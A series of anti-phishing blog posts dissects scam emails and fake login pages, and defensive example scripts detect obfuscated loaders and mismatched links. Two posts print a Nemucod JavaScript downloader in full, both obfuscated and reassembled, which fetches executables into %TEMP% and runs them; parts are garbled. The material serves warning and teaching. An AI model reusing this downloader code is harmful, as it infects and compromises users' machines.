Paypal Scammers still at it

Got this text message early in May (and I’ve had a couple of others since… these things seem to go in waves as scammers share ideas around).

Just look at the URL that you’re supposed to use to log in: “Erwanbikes”? It’s a real website in India, supposedly for renting bicycles. Either someone has embedded malicious code in a subdirectory of their website without their knowledge, or they are actively involved in the scam. There’s no way of knowing.

Either way, if a communication came from PayPal, the address to go to would be something at

and not some random website. Be careful if you get messages like this and never click on the link unless you know or can tell where it has taken you.

If you’re curious, here’s where the rabbit hole goes:

Note the bogus (i.e. not PayPal) URL. Now they want your information.

Never provide information like this to an unknown entity. SS Number? Mother’s Maiden Name? Run away fast!

If someone wants your credit card information and you don’t know who they are, you’re being scammed.

Once you’ve given the bad guys access to your financial information and your credit card number, you are redirected to the legitimate PayPal website. Then watch your money disappear. Please don’t be taken in by criminal activity of this nature, and watch over your vulnerable loved ones.

The Old Wolf has spoken.

No, I didn’t ask to cancel my Gmail account


Subject: Request to Terminate Your account has been accepted
From: AccountUpdate via
Date: Apr 26 (10 days ago)
To: millions of people

Dear Gmail Customer,

You submitted a request to terminate your Gmail mail account and the process has started by our Gmail mail Team, Please give us 3 working days to close your mail account.

To cancel the termination request reply to this mail.

All files on your Gmail mail including (Inbox, Sent, Spam, Trash, Draft) will be deleted and access to your Gmail mail account will be Denied.

If you wish to Terminate your Email Address, you can Sign Up for a new Gmail mail account.

For further help please contact by replying to this mail.

Gmail! Account Services

Please watch out for emails like this. No, I didn’t ask for my Gmail account to be terminated, and neither did you.

If you respond to the email, you will be confirming that you are a live sucker to these people:,,,,,,,,

And it’s a penny to a quid that every one of them is a scammer who will do their best to get your personal information or your money.

How do you know this message is not from Gmail? It was sent from The Gmail! account team (Gmail doesn’t use a “!” in their name like “Yahoo!” does). In addition to that, the return address is:

AccountUpdate via

A double redirect, one from the UK and one from Turkey. No, Virginia, that’s not Gmail.

Be careful out there.

The Old Wolf has spoken.

Yahoo Mail “Upgrade” scam

Found this in my mailbox just today, although it arrived last week.


The “Upgrade Now” link leads to “,” but the link is now dead. Raven Biotech is a legitimate firm, but some scumbag somewhere managed to get onto their server and add the malicious page – probably designed as a phishing scam or drive-by malware downloading.

Never click on links in emails. Notice where the link goes by hovering your mouse over the link, and then visit the page directly.

If you’re not sure an email is valid, contact the company by phone.

Never provide sensitive banking, financial, or password information on the internet if you don’t know who you are dealing with. Be careful out there.

The Old Wolf has spoken.

WordPress users, please use strong passwords

Just got phishing spam from bad guys pretending to be the Bank of Ireland. Here’s the email:

Bank of Ireland Phishing

If you are fooled into clicking the link, you are redirected to:

The “obfusticated” prevents anyone from actually going to the bad site, and protects the WordPress user whose website (“”) has been compromised. For what it’s worth, I’ve done my best to warn the individual involved that there is a problem at their website.

The gateway page is below. It looks very official, but don’t let that fool you. It’s a fake.

Bank of Ireland Phishing 2

Then you get to give the criminals your login PIN:

Bank of Ireland Phishing 3

The malicious code appears to fail the first time and makes you re-enter the data. It doesn’t matter what you put in the second time, you’ll advance to the next page:

Bank of Ireland Phishing 4


Next you are asked to hand the criminals your credit card password.

Bank of Ireland Phishing 5

Once they have your data – or in my case, a whole raft of obscenities – you are redirected to the real Bank of Ireland website.

If you have a WordPress blog (or any other website) please make sure you are using strong passwords. If bad guys get in, they can park malicious code in your web space and direct their victims there, not to mention steal whatever valuable data is there.

Never give out sensitive financial information over the web. If you suspect your accounts have truly been compromised or locked, call your bank directly and ask for verification.

Be careful out there.

The Old Wolf has spoken.

Phishing is still very much a thing. Please be careful.

This showed up in a business email account yesterday. Please note, I don’t have an account with US Bank, and the “To:” field has an address that is not mine.

Fraud 0

When you click on the “Login Here” link, if you’re silly enough to do so, this is what you get:

fraud 1

Biggest red flag: the web page you just got redirected to is not but rather “” (Judy Bruce is an author, and for some reason her web page has been compromised by malefactors. I have done my best to notify her so she can get this infestation cleaned out.)

Followed by a request for your password:

Fraud 2

But wait, there’s more!


Really, people? You’re just going to give out your sensitive financial information to some random mailer on the internet?

But hey, if you’re going to do that, you might as well give the crooks access to your email account as well:

Fraud 3

Fraud 5

Please be careful out there. A bank will never ask you to provide sensitive information of this nature via email or on the web. If you have doubts or questions, contact your financial institution directly before providing any information.

Please protect yourselves and your vulnerable loved ones.

The Old Wolf has spoken.

Not from Yahoo (scam)


“Your Mail version is outdated.” “Upgrade your account now.”

Never follow links like this that ask you to enter your email username and password. Would you hand your credit card to a criminal? Don’t give access to your Yahoo, Gmail, Hotmail, or other accounts to scammers.

If you have loved ones who are not especially tech-savvy, please protect them from this kind of jiggery-pokery.

Be safe out there.

The Old Wolf has spoken.

Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the JavaScript code wants to go out to,, and (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Jimmie Cowan,
Clerk of Court.

That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”);; xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try {“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.


I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Calvin Gleason,
E-ZPass Agent.

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a JavaScript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  
function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function 
igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return 
‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function 
igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”);; xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try {“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a JavaScript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.
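An attachment like this can be read without ever running it. The sketch below is an added example, not code from the original post: it treats the file purely as text, puts the numbered fragment functions back in order, and reports which of the API names seen in the script above turn up. The sample input, its `qx`/`kz` names and the `analyze` function are constructed for illustration.

```javascript
// Added example: static reassembly of a "fragment function" script.
// The input is only ever handled as text; nothing in it is executed.

// API names that appear in the reassembled script shown on this page.
const INDICATORS = ['ActiveXObject', 'WScript.Shell', 'MSXML2.XMLHTTP',
  'ADODB.Stream', 'saveToFile', '.Run(', '%TEMP%'];

// Matches: function NAME123() { return 'literal'; }  (digits optional)
const FRAGMENT =
  /function\s+([A-Za-z_$]+?)(\d*)\s*\(\s*\)\s*\{\s*return\s*'([^']*)'\s*;?\s*\}/g;

function analyze(source) {
  // Blog and mail software often replace quotes with typographic ones.
  const text = source.replace(/[\u2018\u2019]/g, "'")
                     .replace(/[\u201C\u201D]/g, '"');
  const numbered = new Map(); // prefix -> Map(index -> literal)
  const helpers = new Map();  // unnumbered function name -> literal
  for (const [, name, digits, literal] of text.matchAll(FRAGMENT)) {
    if (digits === '') { helpers.set(name, literal); continue; }
    if (!numbered.has(name)) numbered.set(name, new Map());
    numbered.get(name).set(Number(digits), literal);
  }
  // Treat the prefix with the most numbered functions as the fragment family.
  let prefix = null;
  let parts = new Map();
  for (const [p, m] of numbered) {
    if (m.size > parts.size) { prefix = p; parts = m; }
  }
  // Join fragments in numeric order, which is what the loader loop does,
  // and record any index that is absent (a truncated or damaged sample).
  const last = parts.size ? Math.max(...parts.keys()) : 0;
  const missing = [];
  let code = '';
  for (let i = 1; i <= last; i++) {
    if (parts.has(i)) code += parts.get(i); else missing.push(i);
  }
  // The loader hides its eval call as this[a()+b()](...): look for two
  // helper functions whose return values join to the string "eval".
  const lits = [...helpers.values()];
  const hidesEval = lits.some(a => lits.some(b => a + b === 'eval'));
  const indicators = INDICATORS.filter(s => code.includes(s));
  return { prefix, fragments: parts.size, missing, hidesEval, indicators, code };
}

// Constructed sample in the same style; it is not the file from the post and
// reassembles to a single non-functional statement.
const SAMPLE = `
function qx7() { return ‘t.Shel’; };  function qx2() { return ‘s = n’; };  function qx11() { return ‘);’; };
function qx5() { return ‘ject("’; };  function qx1() { return ‘var w’; };  function qx9() { return ‘s.Run(’; };
function qx4() { return ‘iveXOb’; };  function qx10() { return ‘fn,1,0’; };  function qx3() { return ‘ew Act’; };
function qx8() { return ‘l"); w’; };  function qx6() { return ‘WScrip’; };
var acc = ‘’; function kz() { return ‘e’; };  function qx() { return ‘val’; };
for (var n=1; n<=11; n++) { acc += this[‘qx’+n](); } this[kz()+qx()](acc);
`;

console.log(analyze(SAMPLE));
```

A non-empty `missing` list means the copy being examined is incomplete, so the reassembled text should not be taken as the whole script.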

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks


Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.
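The “hover over the link” check from the list above can also be done mechanically on the HTML of a message. This is an added example, not something from the original post or the business quoted: it compares what each link shows with the host it really points to, and flags links that name a brand but lead somewhere else, as in the PayPal and Yahoo messages on this page. The `TRUSTED` list, the function names and the sample message are assumptions constructed for illustration.

```javascript
// Added example: compare where a link says it goes with where it really goes.
// TRUSTED maps a brand name to the domains it is assumed to use; the entries
// are placeholders for a list you maintain yourself.
const TRUSTED = { paypal: ['paypal.com'], yahoo: ['yahoo.com'] };

const ANCHOR = /<a\b[^>]*?\bhref\s*=\s*(["'])(.*?)\1[^>]*>([\s\S]*?)<\/a>/gi;

// True when host is the domain itself or a subdomain of it. The leading dot
// matters: "paypal.com.account-check.example" is NOT within "paypal.com".
function within(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Hostname as the browser would resolve it (ignores any "user@" prefix).
function hostOf(raw) {
  try { return new URL(raw).hostname.toLowerCase(); } catch { return null; }
}

function checkLinks(html) {
  const findings = [];
  for (const [, , href, inner] of html.matchAll(ANCHOR)) {
    const shown = inner.replace(/<[^>]*>/g, '').trim();
    const host = hostOf(href);
    const reasons = [];
    if (host === null) {
      reasons.push('unparseable href');
    } else {
      // 1. The visible text is itself a hostname that differs from the target.
      const m = shown.match(/(?:https?:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)/i);
      if (m) {
        const claimed = m[1].toLowerCase().replace(/^www\./, '');
        if (!within(host, claimed)) {
          reasons.push(`text shows ${claimed}, link goes to ${host}`);
        }
      }
      // 2. A known brand is named in the text or URL, but the host is not theirs.
      for (const [brand, domains] of Object.entries(TRUSTED)) {
        const named = (shown + ' ' + href).toLowerCase().includes(brand);
        if (named && !domains.some(d => within(host, d))) {
          reasons.push(`mentions ${brand} but host is ${host}`);
        }
      }
    }
    if (reasons.length) findings.push({ href, shown, host, reasons });
  }
  return findings;
}

// Constructed message body; every hostname except paypal.com is a placeholder.
const EMAIL = `
<p>Your account is limited.
<a href="http://bikes.example/pp/login.php">Log in to PayPal</a></p>
<p><a href="https://www.paypal.com/signin">https://www.paypal.com/signin</a></p>
<p><a href="https://paypal.com.account-check.example/">paypal.com</a></p>
<p><a href="https://paypal.com@login.example/">Confirm</a></p>
<p><a href="https://news.example/story">Read more</a></p>
`;

console.log(checkLinks(EMAIL));
```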

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

Never “Verify Your Email.”

No email service will send you a message asking you to provide your address and password, or other financial data. They just won’t.


This email is bogus. Note the red circle next to the “click to validate” link – that’s a warning from WOT (Web of Trust) that indicates the website is not to be trusted.

If you’re foolish enough to click the link, which goes to (NOT a Yahoo website), you’ll get this:


If you fill out this information, scammers now have access to your email account, and they will use it to steal information or send out criminal spam.

Never do this. Be careful out there.

The Old Wolf has spoken.